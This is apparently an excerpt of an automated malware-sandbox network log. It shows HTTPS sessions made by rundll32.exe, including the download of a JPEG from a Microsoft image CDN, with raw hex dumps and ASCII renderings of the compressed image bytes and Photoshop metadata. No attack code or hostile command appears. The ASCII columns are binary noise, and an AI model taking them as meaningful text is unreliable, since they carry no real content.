                                                                                                                                                                                    2023-01-05 07:58:10 UTC2319INData Raw: 37 62 dd 52 7d d5 a4 87 63 0f c4 8c 6b 2c 60 86 6f 7f dd a6 8a 68 c8 df c8 d8 5d 89 01 07 6a ba f4 e5 4f 16 f0 98 9a c0 a4 84 5d 48 1d 6a df 6d 05 4b 4e 97 23 13 75 ed b5 98 f8 68 ed 95 24 d9 ef 36 a2 f0 6d f2 17 69 09 bb 4a 64 6f cc c5 47 2e 14 fb 2d d4 ff 00 a8 4f 4f d4 3a 9c e3 2c 00 e7 5e 86 3e ab 7d ec 6b ff 00 13 f3 19 96 0f d1 11 13 3d c7 a9 89 e9 f4 bc 0d 49 16 d5 5f 75 bc 52 ac f3 c8 d7 19 29 d2 25 5e 9c 31 c5 5d ff 00 72 87 eb 4c 6c 86 32 9f 04 5f 00 79 82 a7 dc 3e 2a 78 02 05 90 0d 25 17 25 c5 fc 59 74 d4 71 c9 1d 9d 2e 19 93 42 f7 e9 cb ee f4 f2 d1 54 00 29 b5 c7 f5 6b 45 77 06 68 00 16 52 ea 71 bf 56 5e a7 08 95 53 98 d2 cb b6 de c9 3f ca 44 22 6d e4 b3 9e 65 2a 79 d9 7e ff 00 4c 69 d7 25 33 47 00 1b 6d 7d 38 f5 ba 20 e9 b5 ba 5b cd 52 fc c2
                                                                                                                                                                                    Data Ascii: 7bR}ck,`oh]jO]HjmKN#uh$6miJdoG.-OO:,^>}k=I_uR)%^1]rLl2_y>*x%%Ytq.BT)kEwhRqV^S?D"me*y~Li%3Gm}8 [R
                                                                                                                                                                                    2023-01-05 07:58:10 UTC2351INData Raw: ad a4 7b fb ed da 59 72 97 71 0b 7a 98 c5 a2 7a 4d b6 d3 19 53 16 97 3c 9b 3c aa 3f 94 fc 97 70 bb c8 60 52 25 dc b2 0f 8a 85 bf 51 07 a5 13 0c 92 48 3f 2b 70 f9 7c 5f 0d 4f f2 dd 82 7a 10 49 23 c9 04 01 b9 51 dc 5d fd 3f 52 d8 2b a8 e6 e6 f0 f9 aa 3d 96 d1 55 a7 92 4b 61 c0 92 4d 97 5e 1c dd 8b 43 d6 0d 1a 5c ae a0 d8 32 f2 91 7f 65 3e a0 90 38 de b9 8d 8f 60 a5 c0 59 e2 24 83 c4 1b d0 0f d6 7b 47 60 35 65 04 7d 74 50 31 0a c2 cd af 1d 78 1e fa 0a c0 00 28 67 d3 71 7f aa 8c d1 d9 14 de c1 7f a2 8a 83 60 c3 50 3f ae 83 0d 18 10 45 e9 21 8d 80 81 e4 69 4c 40 74 c9 6c 6f f7 59 7a 2b 5e 34 a4 30 c8 b5 ad da 3d ea f4 54 02 97 bd c8 d6 ff 00 5d 0e 63 23 31 b0 02 82 18 cb eb 62 a0 d8 9f c5 4b 23 2d e1 46 65 08 6c 71 3e f5 41 08 21 1e 27 cc b5 b5 62 c7 a7 d8 8b
                                                                                                                                                                                    Data Ascii: {YrqzzMS<<?p`R%QH?+p|_OzI#Q]?R+=UKaM^C\2e>8`Y${G`5e}tP1x(gq`P?E!iL@tloYz+^40=T]c#1bK#-Felq>A!'b
                                                                                                                                                                                    2023-01-05 07:58:10 UTC2367INData Raw: c8 50 6f 4a 79 55 14 cd ea 6d c9 bc 4a 3a c3 a7 e5 bc 76 c9 ce 75 33 6c 54 c9 bd dc dc 08 24 4b 64 96 be 43 2f 87 ea 61 8c 98 ab 67 e4 ad 96 c5 c1 8f 75 b9 91 e4 f5 09 1a 04 e5 e9 eb 6f f0 fe 2a fd 57 ce b7 0c 0c 6a 4a 6d 61 6f 8f 31 5e 96 bd be 04 3e 26 cb 9a 95 76 11 c3 09 43 ea 15 43 91 c8 f5 c7 ea 1e 77 b7 56 5f 86 9b d2 77 8e 09 8a 69 96 a3 01 a6 4d e2 fc 55 0a 97 49 22 42 6d 22 5b 32 7c 31 ca ad fe 9f 83 dc a3 b7 de ba ab 96 0c 0c a9 cb 62 3b 5c 73 16 d1 56 35 e8 a6 36 4f 83 65 e5 b0 bf 60 fb cd 48 d2 aa 82 ea 18 2f 1d 0f 0b db a6 96 40 00 16 bd af dd 4b 32 81 8d c9 b3 58 8e 1e 5a 50 f1 b3 ca d6 25 9f 80 fb b6 f0 d4 db 2d aa 2c 42 49 01 3b 96 04 3b 42 05 fd 14 8b 8e 53 bf 33 7b b4 7d 57 00 83 8a 20 25 99 b1 5b 46 71 e9 8d 55 7e 1e 2b 5f af 9d 18 46
                                                                                                                                                                                    Data Ascii: PoJyUmJ:vu3lT$KdC/aguo*WjJmao1^>&vCCwV_wiMUI"Bm"[2|1b;\sV56Oe`H/@K2XZP%-,BI;;BS3{}W %[FqU~+_F
                                                                                                                                                                                    2023-01-05 07:58:10 UTC2382INData Raw: e8 28 bd 98 6b 7b 1d 7b 6d 6e ca 10 34 65 e6 9a ca 80 dd 48 2d d0 cb 53 7c ab 7a c9 ea a8 01 9d 48 75 b1 d4 f3 0e 3f 86 93 74 64 53 b1 f5 92 29 1a e0 32 97 3c ad e9 b1 cb 0f 7e b7 1b 76 55 8e 21 73 b6 91 98 b2 c8 17 ab 6f 0c a3 e1 fa 87 a9 f2 ea f0 d1 67 4b 16 e9 b0 b0 d2 b7 3f fa bb 7c c0 ff 00 e2 b7 48 18 48 22 36 f5 6c 1b f2 88 f5 7a be 17 57 87 3a 64 40 c1 35 00 c8 39 8d b8 96 1e 1d 69 67 f4 21 9d 20 21 da 39 5b 10 e3 cb c5 49 5f bb 50 7c d4 18 77 91 6e 3d 59 3f 48 a5 98 c2 a0 d9 8c df 77 f8 6b e3 ea a9 5b e5 21 a3 d9 2d 8c 5e a8 b3 32 f9 bc b9 b1 f0 d4 72 63 71 2d f0 b6 a4 d8 e2 6e 07 0a 01 72 49 54 d8 68 6f 73 4d 22 43 29 db 29 50 4b 29 06 ec 34 1f bd d3 e6 a0 ab 66 5b 82 5a c4 10 7c 51 d8 f9 6a 36 37 c6 50 4c 6c 78 30 bd ae b5 93 80 5b 0c 54 91 c2
                                                                                                                                                                                    Data Ascii: (k{{mn4eH-S|zHu?tdS)2<~vU!sogK?|HH"6lzW:d@59ig! !9[I_P|wn=Y?Hwk[!-^2rcq-nrIThosM"C))PK)4f[Z|Qj67PLlx0[T
                                                                                                                                                                                    2023-01-05 07:58:10 UTC2398INData Raw: 40 71 af e9 ff 00 75 5c f6 d5 c6 b4 52 64 2f 30 be 2f 97 01 6e 55 c7 ef 73 50 8e e4 21 d6 af 20 25 47 60 a6 31 74 92 6c 0f 75 09 df 2f 4e 2b 06 c7 46 23 c8 9e f5 15 4e 0d d9 dc 3b 8f bd 4b 14 63 53 c4 9f e9 a6 74 22 41 13 73 04 be 58 ff 00 ad c3 f2 d4 f8 a8 64 c4 db a7 5b e9 59 54 77 99 9b d1 8c c3 10 26 e1 10 f1 48 c7 83 8d 2c 65 b9 63 5c 47 7d bc b7 a8 04 f1 83 22 06 57 20 58 63 6c 63 55 fb b6 e3 57 14 a8 61 56 64 6c 89 24 dd bd c3 ff 00 2d 7e bf 62 b6 42 0d 94 8b e1 71 a8 d7 fb ad 51 cd b9 8e 38 da 28 23 86 35 88 62 a1 50 72 96 1d ae 7a 9f de 6a 66 6b 5f f6 5e 99 64 22 c4 59 49 ed 24 db f9 a9 a2 40 04 6a 79 6d db f5 9a 96 28 9b 11 38 0a c3 b6 c0 e5 56 9b 52 06 95 7e c3 57 14 b6 f2 8f a0 6d e2 eb 37 3a f0 d3 8d 36 e1 a6 97 d5 45 52 63 64 b6 44 8e 61 1b
                                                                                                                                                                                    Data Ascii: @qu\Rd/0/nUsP! %G`1tlu/N+F#N;KcSt"AsXd[YTw&H,ec\G}"W XclcUWaVdl$-~bBqQ8(#5bPrzjfk_^d"YI$@jym(8VR~Wm7:6ERcdDa
                                                                                                                                                                                    2023-01-05 07:58:10 UTC2414INData Raw: 8d e8 6d 63 70 8e c4 15 b9 f8 9b 97 3e 6d 71 f0 e7 8a d0 0c 72 28 48 26 fc 47 86 ae 2b 4a f4 a6 46 8d c7 15 60 41 fe 7a 96 43 10 94 b6 8a d7 00 ae 3d 6d cd 4f 16 d8 22 c8 01 6c 72 2d 60 47 34 7a 72 df c5 4e bb c6 5f 55 53 94 91 6c 54 2e bd 3e 4f 2f 8a a1 8e 17 59 a1 6c 8e a0 d9 4f 4b 94 ff 00 a9 6e 7a 90 ed 13 d2 11 c4 07 ac da 4a ea 7f 33 24 5e 56 3d bf e6 a6 3b 95 02 fa 47 8d c6 9f 77 f9 63 4d 24 36 45 8e cb 62 75 24 d3 43 33 86 08 a0 ae 0d 74 46 e2 e6 ed a9 1f 72 83 6c 83 38 44 52 74 21 8e 23 99 d7 4e 78 a8 3c 62 30 51 18 35 f5 17 bf 52 f9 e4 5f 7a 8a 30 52 59 89 ca dc c2 ff 00 e1 a1 30 37 5b d9 80 3c 3f cc d4 b3 a0 56 75 39 70 07 51 d2 ad ee d2 4f 22 47 b7 91 1b 26 61 72 ce 78 96 7f 2e 5f bb 4b 2b 10 43 12 55 9b bf ea f2 d0 51 95 98 d8 00 d7 1e f7 77
                                                                                                                                                                                    Data Ascii: mcp>mqr(H&G+JF`AzC=mO"lr-`G4zrN_USlT.>O/YlOKnzJ3$^V=;GwcM$6Ebu$C3tFrl8DRt!#Nx<b0Q5R_z0RY07[<?Vu9pQO"G&arx._K+CUQw
                                                                                                                                                                                    2023-01-05 07:58:10 UTC2422INData Raw: 0b 7a 92 a9 5d 40 b3 06 ec 6f 0a e0 39 7d da 26 c1 9d 6e 47 6e 37 f1 06 a6 01 ad 11 36 66 b5 c5 ab d0 9a 45 81 46 47 3b 12 34 e0 ba 79 a9 24 57 2a 80 04 bb 1e 38 8e b1 45 60 67 c1 ca 93 cb 60 7b a4 52 7d bd 34 8e ca 5e 56 b2 e6 c0 8f c3 a7 88 78 98 d0 da ce 6d 04 67 23 9a 9b 12 39 ae ab d5 52 fc c6 57 bd dc 9b 85 36 26 fe 02 3c 5e e5 15 00 a8 06 c8 3b 2d e2 e5 a1 71 8e 5a fb 28 32 a9 b0 d4 9a 05 14 86 6e 37 d7 5b 52 ac fa 35 b8 f6 d0 0b 7b 83 af 71 a1 6d 2f a5 e9 91 c8 d3 81 fe ca b6 23 45 b9 53 db 48 81 6f 22 c9 93 2b 0b ab 0e c0 56 9a 48 d4 22 b1 27 0e c1 ec 15 70 75 ec ab 7d 17 23 85 64 38 51 0a 48 04 0b fb 6d 44 11 7b f6 9e 34 07 0a 2b dd 56 a2 f0 c4 c5 63 c4 b1 e1 60 4f 10 34 ce f5 3c 36 9e 48 81 bc 32 00 7a bc 6b 22 6a 72 cb 97 cb 4c a1 18 95 d6 c5
                                                                                                                                                                                    Data Ascii: z]@o9}&nGn76fEFG;4y$W*8E`g`{R}4^Vxmg#9RW6&<^;-qZ(2n7[R5{qm/#ESHo"+VH"'pu}#d8QHmD{4+Vc`O4<6H2zk"jrL
                                                                                                                                                                                    2023-01-05 07:58:10 UTC2438INData Raw: c0 92 e4 e4 24 c3 8c 61 93 c0 d4 ac cd 86 20 f3 77 69 d9 ef 50 4d b1 b9 8d 81 ec ed f1 37 bd 59 35 dd 71 c4 b7 02 48 18 af 2f ba 39 6b d0 97 2c f8 0f 65 ff 00 e1 a5 96 4b 4c 0e 2c 57 52 a4 5a e5 1f 1e 6c a9 a4 8a 33 19 cc 10 bc 6c a7 5b 7b de ed 7a 4c c5 84 a0 65 a6 a3 de 1e d1 46 54 e5 8e d7 05 bc 56 3c d6 a0 a3 41 df 46 61 2d d8 5a e0 8b 5c 5a 89 d4 e3 a9 d2 c0 0a 57 99 19 55 c5 d4 90 40 23 bc 7d 20 eb 6b eb 6e 3f 65 23 ee 9c 6c d3 42 8e 6e c4 5b a5 a4 f7 db fb b4 25 dd bf a9 1a f2 66 8d 9d d4 6b ca d4 93 ee 13 d0 da 39 28 8e 00 22 cb f7 7a aa 34 57 69 65 24 a8 5b 70 51 d1 ff 00 db 4a cc 74 7b 9c 7b 40 07 fc d5 6b 55 fe 8c 36 d1 b4 86 e0 72 8b ea 78 7e da 2a 78 83 63 52 ee 02 9c 21 02 e7 ef 1b 01 4d 88 d0 9b 5f 8d bd 94 6d db db 57 e3 59 b0 ca 78 f0 f4
                                                                                                                                                                                    Data Ascii: $a wiPM7Y5qH/9k,eKL,WRZl3l[{zLeFTV<AFa-Z\ZWU@#} kn?e#lBn[%fk9("z4Wie$[pQJt{{@kU6rx~*xcR!M_mWYx
                                                                                                                                                                                    2023-01-05 07:58:10 UTC2454INData Raw: d8 09 fc bb f8 b0 e9 ca 98 ec 19 61 df 44 25 9d d2 57 18 7a 51 80 71 8f 2e a9 5b ca dd 5e 1a 2a 12 ca 08 66 6b 70 b7 96 a3 0b 7f 54 17 67 6e cd 7a 10 7f 9a b2 3c 2b b8 55 93 8f 7d 5a ac 2a dc 2b 98 d5 f4 02 b8 f1 ae 3a d7 1b d6 e1 f1 c8 b2 62 09 ec bd 47 f3 5d a4 71 bc b1 24 80 09 5a ca 32 53 1e 4c 78 f8 ba 57 9a 84 50 38 0d 0c 62 41 87 0c dc 73 db 2f 11 cb 9e 8e db 6d 14 92 cc c0 94 44 d7 51 cc 4e 3f e9 a2 64 de ef 55 26 cb 64 99 c1 b5 4b ab 02 2f 24 d2 05 f5 64 9a 44 fc d8 a3 e6 fd 32 78 7c 75 16 e6 7e 78 e2 3c a1 85 ec ba e2 35 f2 b3 5e 8c bb 99 32 93 71 18 75 4d 6e 8a 5f a9 af d3 97 86 84 44 92 40 d2 e6 ae 49 ca b4 b5 f8 d5 ad 7b 56 9c 78 d2 7f ed ff 00 36 98 7a 43 33 28 42 0b 05 be 11 ed 93 c6 93 ee 1b af c5 e9 f2 ae 19 65 50 c9 b0 84 1f 9a ef 00 46
                                                                                                                                                                                    Data Ascii: aD%WzQq.[^*fkpTgnz<+U}Z*+:bG]q$Z2SLxWP8bAs/mDQN?dU&dK/$dD2x|u~x<5^2quMn_D@I{Vx6zC3(BePF
                                                                                                                                                                                    2023-01-05 07:58:10 UTC2470INData Raw: b4 71 62 07 7f 03 41 99 80 02 dc 75 a2 63 37 d6 f6 1c 2a e4 1b 1d 68 23 36 28 dd bc 6d 58 ae 8d db 45 18 01 7d 2f ed ef ad 1f 0b 9e 3d 9f b2 99 20 e9 e0 49 ee 3d 95 7e a3 63 6b eb c6 8d b4 3c 2b 26 bb 0b d8 8e 17 ac 86 b2 82 2c bf 5f 0f ae 8b 4d c5 74 fa ab 27 00 81 a6 87 be bb ab 5a d7 e9 d2 ac 38 57 35 77 eb 45 bb 3e 8d b4 89 2b 7a ad 66 90 15 38 ab 65 cb 1a b0 f7 79 d9 a9 d3 64 9e bc 20 28 97 71 20 01 98 83 65 f4 97 c5 12 1f 0f 9a 82 c6 2d 0d ed 69 39 b9 97 bb 5e 9c 68 c9 34 e4 24 81 8a 08 d6 fc c4 64 11 b5 5c 13 fd 4f 2d 7a 9b 65 67 8c 28 0b 96 ad a7 57 b1 95 df f2 72 e9 a9 65 59 24 8b 0e 6c 17 51 c7 4c 87 bf e2 c6 83 92 0c b0 9c 95 55 74 75 3c ca f7 f1 64 28 fc d2 29 24 85 91 51 8a 9d 58 87 2c 8f af 0b ae 3c a9 e5 a7 43 23 b9 8c 90 b9 90 6c bd 89 7f
                                                                                                                                                                                    Data Ascii: qbAuc7*h#6(mXE}/= I=~ck<+&,_Mt'Z8W5wE>+zf8eyd (q e-i9^h4$d\O-zeg(WreY$lQLUtu<d()$QX,<C#l
                                                                                                                                                                                    2023-01-05 07:58:10 UTC2502INData Raw: 28 ed 1d b6 a6 8d 46 24 91 8d bb 00 e3 41 f7 31 33 44 cd 8b 69 d9 e7 47 ec a2 20 94 95 d3 32 6e 10 1e ce 5f dd fb b4 65 f9 5c 48 d2 44 a5 b0 72 32 60 3c b1 71 76 53 d3 8f de c6 84 81 c4 2e a4 86 22 d7 6b f5 64 de 15 a0 24 2b cb 26 4d 18 20 73 74 8f 89 e2 ca a4 86 42 22 4b e9 e9 90 8c d7 ed fc 1e 5a 10 5a 49 e6 20 86 c9 b9 6d d9 88 a5 b5 95 a2 20 80 45 8d bd 8d d9 f7 68 bc 37 08 2e 5d 2f a8 62 7f a1 6a 7d d6 dc c4 b2 c5 82 2c 41 89 91 af ab 4c a2 df bd 48 49 f5 a2 94 64 54 71 0e bd fe c7 e6 5a 79 33 68 96 47 0d 08 16 21 58 75 23 ff 00 97 1a cd e5 66 db 80 78 8e be c3 61 ff 00 0d 42 9b 53 3f eb 2c 7d 64 21 71 6b 9e a8 fe e7 68 a6 89 a1 9e d6 e2 0d ad f5 d2 c6 26 68 cd ec 73 ee 3e 63 d5 4c d1 4c b2 22 91 91 53 70 16 dc 97 ed fb b4 02 3a 16 3c 39 ac 4f 70 a8
                                                                                                                                                                                    Data Ascii: (F$A13DiG 2n_e\HDr2`<qvS."kd$+&M stB"KZZI m Eh7.]/bj},ALHIdTqZy3hG!Xu#fxaBS?,}d!qkh&hs>cLL"Sp:<9Op
                                                                                                                                                                                    2023-01-05 07:58:10 UTC2518INData Raw: 5a 3b 39 d1 a5 86 32 5b 01 60 4b 81 c4 d0 91 78 8a 06 26 65 60 08 2d 91 b9 bf 1a bb 5c d3 34 88 d0 b0 44 8e 20 86 e1 11 57 17 5d 7f d4 ff 00 35 06 8c 5c f0 23 b3 d8 68 aa f1 bd 5b 8f d1 6e ca bf d0 22 8c 16 76 36 00 54 5b ed c1 12 4f 23 1c 22 fb bd 4e fe e8 6e 5f 79 a9 77 7b d6 11 42 e4 aa cc f7 c0 37 d6 29 a3 76 2f 8b 11 97 7d 08 a3 02 e7 bc d8 54 e2 12 cf 02 58 17 17 c4 93 a2 e5 fe 5a 2a 7a af a5 24 71 73 4a f7 25 40 37 b9 38 af b0 53 42 cb 67 56 20 db 5d 45 12 45 e4 b1 b5 f8 eb dd 47 21 75 23 81 3d b5 68 45 ef d8 2b 39 18 01 a1 d7 b8 d0 17 2e dd c0 56 61 75 fd b4 0c a6 d1 f6 96 36 b5 16 8c 63 0a 8b e5 6e ca 12 a8 e4 ec 3d ff 00 55 59 c6 29 fd 34 05 f5 5e da 12 0b b0 ec d6 c2 b3 98 75 77 df b6 83 22 e2 87 40 c7 41 41 08 2c fa da c0 ea 07 6f d5 41 11 1b
                                                                                                                                                                                    Data Ascii: Z;92[`Kx&e`-\4D W]5\#h[n"v6T[O#"Nn_yw{B7)v/}TXZ*z$qsJ%@78SBgV ]EEG!u#=hE+9.Vau6cn=UY)4^uw"@AA,oA
                                                                                                                                                                                    2023-01-05 07:58:10 UTC2526INData Raw: f0 ee 14 4a a9 23 2b 0f ec ac 6d ec 22 9a 38 d7 22 a8 5f 1b d8 9b 76 2f b6 8c 6a 48 d0 b2 ff 00 65 6b 6b 85 0a 48 e1 a5 1c 4d ec 2a d5 f5 51 f6 d1 0c 4d c1 b8 af 51 0f 28 ef d2 ac 46 b5 a0 b5 0d 6d 7e fa b2 ad b4 ad 6e 68 28 17 24 f0 ac 17 ab b4 d0 62 c2 c6 83 3e 2e 97 17 5b f7 7b 68 b4 6a 15 5b b3 fa e8 dc df eb a2 cc 86 ec 32 1f 57 b3 e8 e1 57 3a 27 79 ac 55 80 c5 4b 16 3d fe 5a ca 28 f2 00 f6 71 d3 d9 4e d6 c6 d8 ae 36 e2 7b 6b d3 9e 42 f2 18 94 33 5a c4 01 d0 8c dd d4 f2 ee 01 ce 68 ef 1e 36 d5 d4 e9 99 3a e1 8e 5d 3d 75 fa b8 16 d8 c6 85 35 1c 47 53 bf bd ee d3 49 04 23 6f 96 40 84 63 ae 63 16 ff 00 8b 4a 63 13 84 2c da 16 3c 4a f3 62 be f5 06 0a 27 6c 6e 7d 40 00 c9 f9 ac a9 d9 4b 2b 47 1a b8 0c 00 b9 ca e3 5c 70 8f fc 4d 52 05 db 08 e2 1a 11 99 38
                                                                                                                                                                                    Data Ascii: J#+m"8"_v/jHekkHM*QMQ(Fm~nh($b>.[{hj[2WW:'yUK=Z(qN6{kB3Zh6:]=u5GSI#o@ccJc,<Jb'ln}@K+G\pMR8
                                                                                                                                                                                    2023-01-05 07:58:10 UTC2558INData Raw: cb a1 23 db fe 6a c2 35 b0 3c 0d 5b 2b fb 49 a2 f2 b6 a0 e8 aa 2f 7f af ca 2a cf ca c3 40 a2 b9 16 c7 fa e8 2b 02 ce df cd 44 8d 23 8c 06 6f e5 ed a2 92 38 8a 30 32 20 9b 7e f7 fc 34 cd 11 55 8f 1c ae 46 a6 de 4f f7 d7 a9 08 52 be d1 7b 5b de 3e 6a 26 76 bb 5f 48 d7 80 1d f7 ab 4b af 13 88 ae 54 c8 9b e2 87 5b 7b 4d 65 31 f4 d0 8c 40 3d bf 86 bd 52 a6 79 48 b1 67 d4 d8 74 da fc 00 5a 20 a8 52 40 c4 76 da 81 71 ed 0a 78 56 6c 8a ab c6 f4 31 05 d4 f0 36 e3 59 b2 90 83 53 dd 40 6d c1 3f 65 65 27 2a 30 e2 6d c0 50 52 f7 17 37 0b 6b d0 89 91 99 ef 88 04 f0 ff 00 8a b1 4c af 6b 5a c6 da 57 a9 3b 1c 40 24 eb af b2 d5 80 c9 d9 b5 20 02 49 fd 95 1b 49 0c 71 c6 1b 15 cc 80 cc 7b b1 1c f7 a4 da 3c 23 f5 91 a8 93 d4 32 b2 16 4b f3 c3 8a 5c 73 f4 e5 4f b9 89 96 20 ba
                                                                                                                                                                                    Data Ascii: #j5<[+I/*@+D#o802 ~4UFOR{[>j&v_HKT[{Me1@=RyHgtZ R@vqxVl16YS@m?ee'*0mPR7kLkZW;@$ IIq{<#2K\sO


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                    32192.168.2.44973280.67.82.211443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                    2023-01-05 07:58:10 UTC414OUTGET /cms/api/am/imageFileData/RE55T0T?ver=6359 HTTP/1.1
                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134
                                                                                                                                                                                    Host: img-prod-cms-rt-microsoft-com.akamaized.net
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    2023-01-05 07:58:10 UTC574INHTTP/1.1 200 OK
                                                                                                                                                                                    Last-Modified: Sat, 17 Dec 2022 09:06:21 GMT
                                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                                    X-Datacenter: northeu
                                                                                                                                                                                    X-ActivityId: 0e64cd35-8e83-4c19-be74-3e0cf600cf25
                                                                                                                                                                                    Timing-Allow-Origin: *
                                                                                                                                                                                    X-Frame-Options: DENY
                                                                                                                                                                                    X-ResizerVersion: 1.0
                                                                                                                                                                                    Content-Type: image/jpeg
                                                                                                                                                                                    Content-Location: https://image.prod.cms.rt.microsoft.com/cms/api/am/imageFileData/RE55T0T?ver=6359
                                                                                                                                                                                    X-Source-Length: 1642279
                                                                                                                                                                                    Content-Length: 1642279
                                                                                                                                                                                    Cache-Control: public, max-age=350029
                                                                                                                                                                                    Expires: Mon, 09 Jan 2023 09:11:59 GMT
                                                                                                                                                                                    Date: Thu, 05 Jan 2023 07:58:10 GMT
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    2023-01-05 07:58:10 UTC575INData Raw: ff d8 ff e1 14 4b 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 07 01 12 00 03 00 00 00 01 00 01 00 00 01 1a 00 05 00 00 00 01 00 00 00 62 01 1b 00 05 00 00 00 01 00 00 00 6a 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 1f 00 00 00 72 01 32 00 02 00 00 00 14 00 00 00 91 87 69 00 04 00 00 00 01 00 00 00 a8 00 00 00 d4 00 0e a6 00 00 00 27 10 00 0e a6 00 00 00 27 10 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 32 33 2e 33 20 28 57 69 6e 64 6f 77 73 29 00 32 30 32 32 3a 30 36 3a 32 34 20 30 30 3a 31 35 3a 31 36 00 00 00 00 00 03 a0 01 00 03 00 00 00 01 ff ff 00 00 a0 02 00 04 00 00 00 01 00 00 04 38 a0 03 00 04 00 00 00 01 00 00 07 80 00 00 00 00 00 00 00 06 01 03 00 03 00 00 00 01 00 06 00 00 01 1a 00 05 00 00 00 01 00 00 01 22 01 1b 00 05 00
                                                                                                                                                                                    Data Ascii: KExifMM*bj(1r2i''Adobe Photoshop 23.3 (Windows)2022:06:24 00:15:168"
                                                                                                                                                                                    2023-01-05 07:58:10 UTC622INData Raw: 00 0e 54 61 72 67 65 74 53 65 74 74 69 6e 67 73 00 00 00 08 00 00 00 00 4d 74 74 43 4f 62 6a 63 00 00 00 01 00 00 00 00 00 0a 4e 61 74 69 76 65 51 75 61 64 00 00 00 03 00 00 00 00 42 6c 20 20 6c 6f 6e 67 00 00 00 ff 00 00 00 00 47 72 6e 20 6c 6f 6e 67 00 00 00 ff 00 00 00 00 52 64 20 20 6c 6f 6e 67 00 00 00 ff 00 00 00 00 54 72 6e 73 62 6f 6f 6c 01 00 00 00 0f 65 6d 62 65 64 49 43 43 50 72 6f 66 69 6c 65 62 6f 6f 6c 00 00 00 00 0a 66 69 6c 65 46 6f 72 6d 61 74 65 6e 75 6d 00 00 00 0a 46 69 6c 65 46 6f 72 6d 61 74 00 00 00 05 50 4e 47 32 34 00 00 00 0a 69 6e 74 65 72 6c 61 63 65 64 62 6f 6f 6c 00 00 00 00 0c 6e 6f 4d 61 74 74 65 43 6f 6c 6f 72 62 6f 6f 6c 00 00 00 00 1b 74 72 61 6e 73 70 61 72 65 6e 63 79 44 69 74 68 65 72 41 6c 67 6f 72 69 74 68 6d 65 6e
                                                                                                                                                                                    Data Ascii: TargetSettingsMttCObjcNativeQuadBl longGrn longRd longTrnsboolembedICCProfileboolfileFormatenumFileFormatPNG24interlacedboolnoMatteColorbooltransparencyDitherAlgorithmen
                                                                                                                                                                                    2023-01-05 07:58:10 UTC638INData Raw: 35 5c 41 75 74 6f 52 65 63 6f 76 65 72 5c 5f 42 69 6e 67 2d 4f 6c 79 6d 70 69 63 73 5f 47 65 74 74 79 49 6d 61 67 65 73 2d 31 38 34 39 31 34 39 35 37 5f 31 30 38 30 78 31 39 32 30 46 46 45 36 35 30 33 30 30 30 35 37 32 34 36 34 38 43 32 33 34 37 44 31 33 41 46 42 34 36 37 39 2e 70 73 62 20 73 61 76 65 64 26 23 78 41 3b 32 30 31 36 2d 30 37 2d 32 30 54 31 35 3a 33 38 3a 35 32 2d 30 37 3a 30 30 26 23 78 39 3b 46 69 6c 65 20 43 3a 5c 55 73 65 72 73 5c 76 2d 6c 69 7a 61 67 68 5c 4d 53 5c 57 69 6e 64 6f 77 73 31 30 5c 42 69 6e 67 2d 4f 6c 79 6d 70 69 63 73 5c 43 68 6f 73 65 6e 5c 43 72 6f 70 73 5c 42 69 6e 67 2d 4f 6c 79 6d 70 69 63 73 5f 47 65 74 74 79 49 6d 61 67 65 73 2d 37 38 38 30 38 36 30 37 5f 31 30 38 30 78 31 39 32 30 2e 6a 70 67 20 73 61 76 65 64 26
                                                                                                                                                                                    Data Ascii: 5\AutoRecover\_Bing-Olympics_GettyImages-184914957_1080x1920FFE65030005724648C2347D13AFB4679.psb saved&#xA;2016-07-20T15:38:52-07:00&#x9;File C:\Users\v-lizagh\MS\Windows10\Bing-Olympics\Chosen\Crops\Bing-Olympics_GettyImages-78808607_1080x1920.jpg saved&
                                                                                                                                                                                    2023-01-05 07:58:10 UTC647INData Raw: 70 70 44 61 74 61 5c 52 6f 61 6d 69 6e 67 5c 41 64 6f 62 65 5c 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 43 43 20 32 30 31 35 2e 35 5c 41 75 74 6f 52 65 63 6f 76 65 72 5c 5f 4c 6f 63 6b 73 63 72 65 65 6e 5f 31 30 38 30 78 31 39 32 30 5f 50 6f 72 74 72 61 69 74 44 34 34 44 30 30 33 34 44 31 44 31 46 35 35 46 32 43 44 35 45 37 31 34 43 34 45 44 45 44 31 44 2e 70 73 62 20 73 61 76 65 64 26 23 78 41 3b 32 30 31 36 2d 30 37 2d 32 36 54 31 30 3a 35 31 3a 30 32 2d 30 37 3a 30 30 26 23 78 39 3b 46 69 6c 65 20 43 3a 5c 55 73 65 72 73 5c 76 2d 6c 69 7a 61 67 68 5c 4d 53 5c 57 69 6e 64 6f 77 73 31 30 5c 45 64 67 65 5c 5f 43 72 6f 70 73 5c 45 64 67 65 2d 4c 69 66 65 73 74 79 6c 65 5f 47 65 74 74 79 49 6d 61 67 65 73 2d 37 38 37 31 39 37 32 34 5f 31 30 38 30 78
                                                                                                                                                                                    Data Ascii: ppData\Roaming\Adobe\Adobe Photoshop CC 2015.5\AutoRecover\_Lockscreen_1080x1920_PortraitD44D0034D1D1F55F2CD5E714C4EDED1D.psb saved&#xA;2016-07-26T10:51:02-07:00&#x9;File C:\Users\v-lizagh\MS\Windows10\Edge\_Crops\Edge-Lifestyle_GettyImages-78719724_1080x
